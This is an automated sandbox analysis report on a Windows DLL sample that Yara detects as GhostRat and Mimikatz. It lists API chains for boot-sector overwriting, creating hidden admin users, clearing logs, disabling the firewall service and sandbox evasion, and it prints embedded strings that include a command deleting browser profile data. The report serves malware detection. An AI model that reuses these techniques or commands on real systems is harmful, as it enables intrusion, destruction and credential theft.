                  Source: C:\Windows\System32\loaddll32.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: l10U7QN0CY.dllStatic file information: File size 1269760 > 1048576
                  Source: Binary string: F:\hidden-master\x64\Debug\QAssist.pdb source: loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll
                  Source: Binary string: rundll32.pdb source: rundll32.exe, 00000009.00000002.3726452574.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.9.dr
                  Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000009.00000002.3726452574.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.9.dr
                  Source: Binary string: F:\hidden-master\Debug\QAssist.pdb source: loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll
                  Source: svchos1.exe.9.drStatic PE information: 0x6A8F1B39 [Wed Aug 26 16:58:33 2026 UTC]
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10014700 LoadLibraryA,GetProcAddress,#823,#823,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,strchr,strncat,strncat,strncat,strchr,RegQueryValueExA,wsprintfA,RegQueryValueExA,strchr,RegEnumKeyExA,wsprintfA,wsprintfA,RegEnumValueA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcatA,#825,#825,5_2_10014700
                  Source: l10U7QN0CY.dllStatic PE information: section name: .rodata
                  Source: l10U7QN0CY.dllStatic PE information: section name: .rotext
                  Source: svchos1.exe.9.drStatic PE information: section name: .didat
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1002D080 push eax; ret 5_2_1002D0AE
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002D080 push eax; ret 9_2_1002D0AE

                  Persistence and Installation Behavior

                  barindex
                  Contains functionality to infect the boot sector
                  Source: C:\Windows\System32\loaddll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE05_2_1000E670
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE09_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10025AA0 lstrlenA,lstrlenA,lstrlenA,lstrlenA,NetUserAdd,#825,#825,wcscpy,#825,#825,NetLocalGroupAddMembers,#825,LocalFree,5_2_10025AA0
                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\Public\Documents\MM\svchos1.exeJump to dropped file

                  Boot Survival

                  barindex
                  Contains functionality to infect the boot sector
                  Source: C:\Windows\System32\loaddll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE05_2_1000E670
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE09_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001EFD0 Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,5_2_1001EFD0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001D150 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,5_2_1001D150
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001D150 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,9_2_1001D150
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000E540 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,5_2_1000E540
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10001140 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,#825,#825,#825,#825,5_2_10001140
                  Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Contains functionality to detect sleep reduction / modifications
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001D4A05_2_1001D4A0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001DA705_2_1001DA70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001D4A09_2_1001D4A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001DA709_2_1001DA70
                  Found evasive API chain (may stop execution after checking mutex)
                  Source: C:\Windows\System32\loaddll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-21816
                  Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                  Source: C:\Windows\System32\loaddll32.exeCode function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlenA,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcatA,lstrcatA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,5_2_10019930
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlenA,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcatA,lstrcatA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,9_2_10019930
                  Source: C:\Windows\System32\loaddll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-21955
                  Source: C:\Windows\System32\loaddll32.exeAPI coverage: 2.3 %
                  Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.5 %
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001DA705_2_1001DA70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001DA709_2_1001DA70
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,5_2_10009080
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_100092A0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,5_2_100097D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,5_2_1002AB10
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10009B60 FindFirstFileA,FindClose,FindClose,5_2_10009B60
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,5_2_10009C40
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,5_2_1000BD50
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,9_2_10009080
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,9_2_100092A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,9_2_100097D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,9_2_1002AB10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10009B60 FindFirstFileA,FindClose,FindClose,9_2_10009B60
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,9_2_10009C40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,9_2_1000BD50
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10008E50 GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlenA,lstrlenA,lstrlenA,GetVolumeInformationA,SHGetFileInfoA,lstrlenA,lstrlenA,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlenA,5_2_10008E50
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001B250 GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,GetDriveTypeA,GetDiskFreeSpaceExA,GetTickCount,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetLastInputInfo,GetTickCount,_access,lstrcpyA,5_2_1001B250
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100174C0 BlockInput,BlockInput,BlockInput,5_2_100174C0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10014700 LoadLibraryA,GetProcAddress,#823,#823,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,strchr,strncat,strncat,strncat,strchr,RegQueryValueExA,wsprintfA,RegQueryValueExA,strchr,RegEnumKeyExA,wsprintfA,wsprintfA,RegEnumValueA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcatA,#825,#825,5_2_10014700
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000A580 LocalAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlenA,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapFree,FreeLibrary,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlenA,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,CloseHandle,LocalFree,LocalFree,LocalFree,FreeLibrary,LocalReAlloc,5_2_1000A580

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Contains functionality to automate explorer (e.g. start an application)
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000E780 SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton,5_2_1000E780
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000E780 SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton,5_2_1000E780
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1000E780 SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton,9_2_1000E780
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1000E780 SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton,9_2_1000E780
                  Source: C:\Windows\System32\loaddll32.exeCode function: CreateToolhelp32Snapshot,Process32First,_strcmpi,OpenProcess,TerminateProcess,_strcmpi,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe5_2_1000ED10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateToolhelp32Snapshot,Process32First,_strcmpi,OpenProcess,TerminateProcess,_strcmpi,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe9_2_1000ED10
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10021410 _access,GetModuleFileNameA,ShellExecuteExA,ShellExecuteExA,GetLastError,exit,_access,_access,Sleep,WinExec,WinExec,_access,WinExec,Sleep,_access,Sleep,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,Shellex,5_2_10021410
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001EFD0 Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,5_2_1001EFD0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100209D0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_100209D0
                  Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmpBinary or memory string: Shell_TrayWnd
                  Source: l10U7QN0CY.dllBinary or memory string: Shell_TrayWndProgmanDwmapi.dllDwmIsCompositionEnabledDwmEnableCompositiondwmapi.dllrunasexplorer.exeSeDebugPrivilegecmd.exe /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255\AppData\Local\Google\Chrome\User Data\DefaultC:\Users\\AppData\Roaming\Microsoft\Skype for DesktopSkype.exedel /s /f %appdata%\Mozilla\Firefox\Profiles\*.dbfirefox.exe\AppData\Roaming\360se6\User Data\Default360se6.exe\AppData\Local\Tencent\QQBrowser\User Data\DefaultQQBrowser.exe\AppData\Roaming\SogouExplorerSogouExplorer.exeBITS -inst.sys\system32\drivers\\sysnative\drivers\SYSTEM\CurrentControlSet\Services\BITSSYSTEM\SetupSYSTEM\SelectMarkTimeSYSTEM\CurrentControlSet\Services\\Registry\Machine\System\CurrentControlSet\Services\%SZwUnloadDriverNTDLL.DLLRtlInitUnicodeStringSeLoadDriverPrivilege
                  Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmpBinary or memory string: Progman
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100A8230 cpuid 5_2_100A8230
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10002340 GetWindowLongA,PostQuitMessage,SetWindowLongA,GetModuleHandleA,LoadIconA,SetClassLongA,DestroyWindow,GetDlgItemTextA,GetDlgItem,SetFocus,GetLocalTime,sprintf,GetDlgItem,GetDlgItem,GetWindowTextLengthA,GetWindowTextLengthA,SetWindowTextA,GetWindowTextLengthA,SendMessageA,SendMessageA,SendMessageA,SetDlgItemTextA,GetDlgItem,SetFocus,5_2_10002340
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1002A260 RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,wsprintfA,RegCloseKey,wsprintfA,GetComputerNameA,GetTickCount,wsprintfA,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,wsprintfA,ReleaseDC,wsprintfA,wsprintfA,wsprintfA,GetCommandLineA,wsprintfA,GetUserNameA,wsprintfA,wsprintfA,FindWindowA,GetWindow,GetWindowTextA,GetWindow,GetClassNameA,GlobalMemoryStatusEx,5_2_1002A260
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001E020 GetVersionExA,GetModuleFileNameA,sprintf,WaitForSingleObject,CloseHandle,FindWindowA,FindWindowA,Sleep,FindWindowA,Sleep,FindWindowA,CloseHandle,ExitProcess,5_2_1001E020

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Contains functionality to modify windows services which are used for security filtering and protection
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10026980 OpenServiceA 00000000,sharedaccess,000F01FF5_2_10026980

                  Stealing of Sensitive Information

                  barindex
                  Yara detected GhostRat
                  Source: Yara matchFile source: l10U7QN0CY.dll, type: SAMPLE
                  Source: Yara matchFile source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Yara detected Mimikatz
                  Source: Yara matchFile source: l10U7QN0CY.dll, type: SAMPLE
                  Source: Yara matchFile source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
